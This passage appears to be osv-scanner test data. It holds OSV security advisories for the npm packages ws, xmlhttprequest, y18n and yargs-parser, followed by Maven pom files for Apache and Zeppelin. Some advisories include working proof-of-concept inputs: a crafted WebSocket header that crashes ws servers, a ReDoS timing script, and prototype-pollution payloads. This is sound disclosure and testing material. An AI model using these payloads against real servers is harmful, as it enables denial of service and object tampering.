require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r\\n'\n ].join('\\r\\n');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.6" }, { "fixed": "1.1.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-5v72-xg48-5rpm/GHSA-5v72-xg48-5rpm.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "3.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-5v72-xg48-5rpm/GHSA-5v72-xg48-5rpm.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:ws:20171108" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/550" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/550/versions" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-04T19:37:42Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6663-c963-2gqg", "published": "2019-02-18T23:58:35Z", "modified": "2023-11-08T03:58:11.580073Z", "aliases": [ "CVE-2016-10542" ], "summary": "DoS due to excessively large websocket message in ws", "details": "Affected versions of `ws` do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.\n\n\n\n## Recommendation\n\nUpdate to version 1.1.1 or later. \nAlternatively, set the `maxpayload` option for the `ws` server to a value smaller than 256MB.", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-6663-c963-2gqg/GHSA-6663-c963-2gqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10542" }, { "type": "WEB", "url": "https://github.com/nodejs/node/issues/7388" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6663-c963-2gqg" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/120" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:18:11Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-6fc8-4gx4-v693", "published": "2021-05-28T19:19:03Z", "modified": "2023-11-08T04:05:55.363871Z", "aliases": [ "CVE-2021-32640" ], "related": [ "CVE-2021-32640" ], "summary": "ReDoS in Sec-Websocket-Protocol header", "details": "### Impact\n\nA specially crafted value of the `Sec-Websocket-Protocol` header can be used to significantly slow down a ws server.\n\n### Proof of concept\n\n```js\nfor (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {\n const value = 'b' + ' '.repeat(length) + 'x';\n const start = process.hrtime.bigint();\n\n value.trim().split(/ *, */);\n\n const end = process.hrtime.bigint();\n\n console.log('length = %d, time = %f ns', length, end - start);\n}\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@7.4.6 (https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff) and backported to ws@6.2.2 (https://github.com/websockets/ws/commit/78c676d2a1acefbc05292e9f7ea0a9457704bf1b) and ws@5.2.3 (https://github.com/websockets/ws/commit/76d47c1479002022a3e4357b3c9f0e23a68d4cd2).\n\n### Workarounds\n\nIn vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers using the [`--max-http-header-size=size`](https://nodejs.org/api/cli.html#cli_max_http_header_size_size) and/or the [`maxHeaderSize`](https://nodejs.org/api/http.html#http_http_createserver_options_requestlistener) options.\n\n### Credits\n\nThe vulnerability was responsibly disclosed along with a fix in private by [Robert McLaughlin](https://github.com/robmcl4) from University of California, Santa Barbara.\n", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.4.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6fc8-4gx4-v693/GHSA-6fc8-4gx4-v693.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.2.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6fc8-4gx4-v693/GHSA-6fc8-4gx4-v693.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6fc8-4gx4-v693/GHSA-6fc8-4gx4-v693.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32640" }, { "type": "WEB", "url": "https://github.com/websockets/ws/issues/1895" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff" }, { "type": "PACKAGE", "url": "https://github.com/websockets/ws" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdfa7b6253c4d6271e31566ecd5f30b7ce1b8fb2c89d52b8c4e0f4e30@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210706-0005" } ], "database_specific": { "cwe_ids": [ "CWE-345", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-28T18:18:04Z", "nvd_published_at": "2021-05-25T19:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h4j5-c7cj-74xg", "published": "2021-05-04T18:02:34Z", "modified": "2025-01-14T08:57:22.719908Z", "aliases": [ "CVE-2020-28502" ], "summary": "xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection", "details": "This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (`async=False` on `xhr.open`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run.", "affected": [ { "package": { "name": "xmlhttprequest", "ecosystem": "npm", "purl": "pkg:npm/xmlhttprequest" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-h4j5-c7cj-74xg/GHSA-h4j5-c7cj-74xg.json" } }, { "package": { "name": "xmlhttprequest-ssl", "ecosystem": "npm", "purl": "pkg:npm/xmlhttprequest-ssl" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.6.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-h4j5-c7cj-74xg/GHSA-h4j5-c7cj-74xg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28502" }, { "type": "WEB", "url": "https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6" }, { "type": "WEB", "url": "https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291" }, { "type": "WEB", "url": "https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480" }, { "type": "WEB", "url": "https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js%23L480" }, { "type": "WEB", "url": "https://github.com/mjwwit/node-XMLHttpRequest/blob/ae38832a0f1347c5e96dda665402509a3458e302/lib/XMLHttpRequest.js#L531" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082937" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082938" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T20:34:02Z", "nvd_published_at": "2021-03-05T18:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c4w7-xm78-47vh", "published": "2021-03-29T16:05:12Z", "modified": "2024-12-05T15:28:53.812442Z", "aliases": [ "CVE-2020-7774" ], "summary": "Prototype Pollution in y18n", "details": "### Overview\n\nThe npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. \n\n### POC\n\n```js\nconst y18n = require('y18n')();\n\ny18n.setLocale('__proto__');\ny18n.updateLocale({polluted: true});\n\nconsole.log(polluted); // true\n```\n\n### Recommendation\n\nUpgrade to version 3.2.2, 4.0.1, 5.0.5 or later.", "affected": [ { "package": { "name": "y18n", "ecosystem": "npm", "purl": "pkg:npm/y18n" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.2.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json" } }, { "package": { "name": "y18n", "ecosystem": "npm", "purl": "pkg:npm/y18n" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.1" } ] } ], "versions": [ "4.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json" } }, { "package": { "name": "y18n", "ecosystem": "npm", "purl": "pkg:npm/y18n" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.0.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/issues/96" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/pull/108" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3" }, { "type": "WEB", "url": "https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "type": "PACKAGE", "url": "https://github.com/yargs/y18n" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-20", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-03-12T21:23:11Z", "nvd_published_at": "2020-11-17T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p9pc-299p-vxgp", "published": "2020-09-04T18:00:54Z", "modified": "2025-01-14T08:57:10.212240Z", "aliases": [ "CVE-2020-7608" ], "summary": "yargs-parser Vulnerable to Prototype Pollution", "details": "Affected versions of `yargs-parser` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. \nParsing the argument `--foo.__proto__.bar baz'` adds a `bar` property with value `baz` to all objects. This is only exploitable if attackers have control over the arguments being passed to `yargs-parser`.\n\n\n\n## Recommendation\n\nUpgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.", "affected": [ { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "13.1.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } }, { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "14.0.0" }, { "fixed": "15.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } }, { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "16.0.0" }, { "fixed": "18.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } }, { "package": { "name": "yargs-parser", "ecosystem": "npm", "purl": "pkg:npm/yargs-parser" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.0.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-p9pc-299p-vxgp/GHSA-p9pc-299p-vxgp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7608" }, { "type": "WEB", "url": "https://github.com/yargs/yargs-parser/commit/1c417bd0b42b09c475ee881e36d292af4fa2cc36" }, { "type": "WEB", "url": "https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2" }, { "type": "PACKAGE", "url": "https://github.com/yargs/yargs-parser" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-YARGSPARSER-560381" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1500" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T19:01:32Z", "nvd_published_at": "2020-03-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ] } ] } ================================================ FILE: internal/remediation/testdata/zeppelin-server/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/zeppelin-server/parent/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/zeppelin-server/parent/parent/pom.xml ================================================ 4.0.0 org.apache apache 28 pom The Apache Software Foundation The Apache Software Foundation provides support for the Apache community of open-source software projects. The Apache projects are characterized by a collaborative, consensus based development process, an open and pragmatic software license, and a desire to create high quality software that leads the way in its field. We consider ourselves not simply a group of projects sharing a server, but rather a community of developers and users. https://www.apache.org/ The Apache Software Foundation https://www.apache.org/ Apache License, Version 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt repo Apache Announce List announce-subscribe@apache.org announce-unsubscribe@apache.org announce@apache.org https://mail-archives.apache.org/mod_mbox/www-announce/ scm:git:https://gitbox.apache.org/repos/asf/maven-apache-parent.git scm:git:https://gitbox.apache.org/repos/asf/maven-apache-parent.git https://github.com/apache/maven-apache-parent/tree/${project.scm.tag} apache-28 apache.releases.https ${distMgmtReleasesName} ${distMgmtReleasesUrl} apache.snapshots.https ${distMgmtSnapshotsName} ${distMgmtSnapshotsUrl} Apache Release Distribution Repository https://repository.apache.org/service/local/staging/deploy/maven2 Apache Development Snapshot Repository https://repository.apache.org/content/repositories/snapshots https://www.apache.org/images/asf_logo_wide_2016.png UTF-8 UTF-8 source-release true 3.2.5 1.8 ${maven.compiler.target} 1.7 2.22.2 3.7.0 posix 2022-11-14T22:50:41Z org.apache.maven.plugin-tools maven-plugin-annotations ${maven.plugin.tools.version} apache.snapshots Apache Snapshot Repository https://repository.apache.org/snapshots false apache.snapshots Apache Snapshot Repository https://repository.apache.org/snapshots false org.apache.maven.plugins maven-antrun-plugin 3.1.0 org.apache.maven.plugins maven-assembly-plugin 3.4.2 org.apache.maven.plugins maven-clean-plugin 3.2.0 org.apache.maven.plugins maven-compiler-plugin 3.10.1 org.apache.maven.plugins maven-dependency-plugin 3.3.0 org.apache.maven.plugins maven-deploy-plugin 2.8.2 org.apache.maven.plugins maven-ear-plugin 3.2.0 org.apache.maven.plugins maven-enforcer-plugin 3.1.0 org.apache.maven.plugins maven-failsafe-plugin ${surefire.version} org.apache.maven.plugins maven-gpg-plugin 3.0.1 --digest-algo=SHA512 org.apache.maven.plugins maven-help-plugin 3.3.0 org.apache.maven.plugins maven-install-plugin 3.0.1 org.apache.maven.plugins maven-invoker-plugin 3.3.0 org.apache.maven.plugins maven-jar-plugin 3.3.0 true true org.apache.maven.plugins maven-javadoc-plugin 3.4.1 true org.apache.maven.plugins maven-plugin-plugin ${maven.plugin.tools.version} org.apache.maven.plugins maven-plugin-report-plugin ${maven.plugin.tools.version} org.apache.maven.plugins maven-project-info-reports-plugin 3.4.1 org.eclipse.m2e:lifecycle-mapping org.apache.maven.plugins maven-release-plugin 3.0.0-M6 false deploy apache-release org.apache.maven.plugins maven-remote-resources-plugin 1.7.0 org.apache.maven.plugins maven-resources-plugin 3.3.0 org.apache.maven.plugins maven-scm-plugin 1.13.0 org.apache.maven.plugins maven-scm-publish-plugin 3.1.0 org.apache.maven.plugins maven-site-plugin 3.12.1 org.apache.maven.plugins maven-source-plugin 3.2.1 org.apache.maven.plugins maven-surefire-plugin ${surefire.version} org.apache.maven.plugins maven-surefire-report-plugin ${surefire.version} org.apache.maven.plugins maven-war-plugin 3.3.2 org.apache.maven.plugins maven-shade-plugin 3.4.1 org.apache.rat apache-rat-plugin 0.15 org.apache.maven.plugins maven-remote-resources-plugin process-resource-bundles process org.apache:apache-jar-resource-bundle:1.4 org.apache.maven.plugins maven-enforcer-plugin enforce-maven-version enforce ${minimalMavenBuildVersion} enforce-java-version enforce ${minimalJavaBuildVersion} org.apache.maven.plugins maven-site-plugin attach-descriptor attach-descriptor apache-release org.apache.maven.plugins maven-assembly-plugin org.apache.apache.resources apache-source-release-assembly-descriptor 1.0.6 source-release-assembly package single true ${sourceReleaseAssemblyDescriptor} ${assembly.tarLongFileMode} true org.apache.maven.plugins maven-deploy-plugin true org.apache.maven.plugins maven-source-plugin attach-sources jar-no-fork org.apache.maven.plugins maven-javadoc-plugin attach-javadocs jar net.nicoulaj.maven.plugins checksum-maven-plugin 1.11 source-release-checksum artifacts post-integration-test SHA-512 source-release true false true org.apache.maven.plugins maven-gpg-plugin sign-release-artifacts sign only-eclipse m2e.version org.eclipse.m2e lifecycle-mapping 1.0.0 org.apache.maven.plugins maven-remote-resources-plugin [0,1.8.0) process ================================================ FILE: internal/remediation/testdata/zeppelin-server/parent/pom.xml ================================================ 4.0.0 org.apache.zeppelin zeppelin pom 0.11.1 Zeppelin Zeppelin project https://zeppelin.apache.org org.apache apache 28 ./parent The Apache Software License, Version 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt repo https://git-wip-us.apache.org/repos/asf/zeppelin.git scm:git:https://git-wip-us.apache.org/repos/asf/zeppelin.git scm:git:https://git-wip-us.apache.org/repos/asf/zeppelin.git 2013 build-tools zeppelin-interpreter-parent zeppelin-interpreter zeppelin-interpreter-shaded zeppelin-zengine rlang zeppelin-jupyter-interpreter zeppelin-jupyter-interpreter-shaded groovy spark spark-submit submarine markdown mongodb angular shell livy hbase jdbc file flink flink-cmd influxdb python cassandra elasticsearch bigquery alluxio neo4j java sparql zeppelin-common zeppelin-client zeppelin-client-examples zeppelin-web zeppelin-server zeppelin-jupyter zeppelin-plugins zeppelin-distribution UTF-8 1.8 ${java.version} ${java.version} ${scala.2.11.version} 2.11 2.11.12 2.12.17 3.2.15 1.17.0 v16.20.2 8.19.4 1.12.1 1.7.35 1.2.25 0.13.0 0.62.2 2.8.9 0.2.2 20240205 9.4.52.v20230823 4.4.1 4.5.13 4.0.2 1.21 3.12.0 1.10.0 2.8.0 1.3 1.14 2.7 3.2.2 1.4 1.10.0 1.70 3.6.3 4.1.14 1.6.0 2.7.7 3.0.3 3.1.3 3.2.4 3.3.6 ${hadoop2.7.version} provided hadoop-client hadoop-yarn-api hadoop-client 2.3.2 1.5.4 1.16.1 3.21.7 1.51.0 2.14.0 5.7.1 3.12.4 1.7.0 4.2.0 1.8 3.2.0 1.7.7 1.7 1.4 2.17 3.1.0 2.7 3.8.1 3.1.2 2.8.2 1.6.0 3.0.0-M3 1.6.0 2.17 4.0.0 1.6 3.2.0 3.2.0 1.0.0 3.11.4 0.13 3.1.0 1.4 4.6.3 2.15.2 1.7.1 2.0.0 1.11.2 3.2.1 2.22.2 1.4.1.Final 1.19.0 512m com.vladsch.flexmark flexmark-all ${flexmark.all.version} commons-logging commons-logging org.slf4j slf4j-api ${slf4j.version} org.slf4j slf4j-reload4j ${slf4j.version} ch.qos.reload4j reload4j ch.qos.reload4j reload4j ${reload4j.version} org.slf4j jcl-over-slf4j ${slf4j.version} org.apache.thrift libthrift ${libthrift.version} javax.annotation javax.annotation-api org.apache.httpcomponents httpcore ${httpcomponents.core.version} org.apache.httpcomponents httpclient ${httpcomponents.client.version} commons-logging commons-logging org.apache.httpcomponents httpasyncclient ${httpcomponents.asyncclient.version} commons-logging commons-logging org.apache.commons commons-lang3 ${commons.lang3.version} org.apache.commons commons-text ${commons.text.version} org.apache.commons commons-exec ${commons.exec.version} com.google.code.gson gson ${gson.version} org.json json ${org-json.version} org.danilopianini gson-extras ${gson-extras.version} org.apache.commons commons-configuration2 ${commons.configuration2.version} commons-lang commons-lang 2.6 commons-codec commons-codec ${commons.codec.version} commons-io commons-io ${commons.io.version} commons-collections commons-collections ${commons.collections.version} commons-cli commons-cli ${commons.cli.version} org.apache.shiro shiro-core ${shiro.version} org.apache.shiro shiro-web ${shiro.version} org.apache.shiro shiro-config-core ${shiro.version} org.bouncycastle bcpkix-jdk15on ${bouncycastle.version} org.codehaus.jettison jettison ${jettison.version} org.apache.hadoop ${hadoop-client-api.artifact} ${hadoop.version} ${hadoop.deps.scope} org.apache.zookeeper zookeeper org.apache.hadoop hadoop-common com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty io.netty netty-all commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 com.fasterxml.jackson.core jackson-annotations com.nimbusds nimbus-jose-jwt org.eclipse.jetty jetty-xml org.eclipse.jetty jetty-servlet org.eclipse.jetty jetty-util commons-beanutils commons-beanutils org.apache.commons commons-configuration2 commons-beanutils commons-beanutils-core org.eclipse.jetty jetty-webapp com.fasterxml.jackson.module jackson-module-jaxb-annotations com.fasterxml.jackson.core jackson-core com.fasterxml.jackson.core jackson-databind commons-logging commons-logging org.apache.hadoop hadoop-yarn-common ${hadoop.version} ${hadoop.deps.scope} asm asm org.ow2.asm asm org.jboss.netty netty javax.servlet servlet-api commons-logging commons-logging com.sun.jersey * com.sun.jersey.jersey-test-framework * com.sun.jersey.contribs * com.google.guava guava org.apache.commons commons-compress org.apache.hadoop hadoop-yarn-client ${hadoop.version} ${hadoop.deps.scope} javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-logging commons-logging log4j log4j org.apache.hadoop hadoop-yarn-api ${hadoop.version} ${hadoop.deps.scope} javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-logging commons-logging org.apache.hadoop hadoop-yarn-server-tests ${hadoop.version} tests test org.apache.hadoop hadoop-yarn-common com.sun.jersey jersey-core com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-core-asl org.codehaus.jackson jackson-jaxrs org.codehaus.jackson jackson-xc org.codehaus.jackson jackson-mapper-asl com.google.guava guava javax.xml.bind jaxb-api com.fasterxml.jackson.core jackson-core org.eclipse.jetty jetty-util com.zaxxer HikariCP-java7 com.fasterxml.jackson.core jackson-annotations com.fasterxml.jackson.module jackson-module-jaxb-annotations commons-logging commons-logging io.dropwizard.metrics metrics-core com.google.guava guava com.fasterxml.jackson.core jackson-databind org.apache.hadoop hadoop-common ${hadoop.version} ${hadoop.deps.scope} com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-beanutils commons-beanutils commons-beanutils commons-beanutils-core org.apache.commons commons-configuration2 org.apache.zookeeper zookeeper org.eclipse.jetty jetty-servlet org.eclipse.jetty jetty-util org.eclipse.jetty jetty-webapp org.eclipse.jetty jetty-server com.nimbusds nimbus-jose-jwt com.fasterxml.jackson.core jackson-databind commons-logging commons-logging org.ow2.asm asm com.jamesmurty.utils java-xmlbuilder org.apache.hadoop hadoop-common ${hadoop.version} tests test com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-client com.sun.jersey jersey-server javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl org.codehaus.jackson jackson-mapper-asl org.codehaus.jackson jackson-core-asl com.google.guava guava com.google.code.findbugs jsr305 org.apache.commons commons-math3 commons-beanutils commons-beanutils org.apache.commons commons-configuration2 org.apache.zookeeper zookeeper org.eclipse.jetty jetty-servlet org.eclipse.jetty jetty-util org.eclipse.jetty jetty-webapp org.eclipse.jetty jetty-server com.nimbusds nimbus-jose-jwt com.fasterxml.jackson.core jackson-databind commons-logging commons-logging log4j log4j org.slf4j slf4j-log4j12 org.ow2.asm asm org.junit.jupiter junit-jupiter-engine ${junit.jupiter.version} test org.junit.jupiter junit-jupiter-params ${junit.jupiter.version} test org.assertj assertj-core ${assertj.version} test org.mockito mockito-core ${mockito.version} test org.testcontainers testcontainers ${testcontainers.version} test org.awaitility awaitility ${awaitility.version} test org.testcontainers neo4j ${testcontainers.version} test org.testcontainers junit-jupiter ${testcontainers.version} test org.apache.hadoop hadoop-hdfs ${hadoop.version} test com.sun.jersey jersey-json com.sun.jersey jersey-client javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit 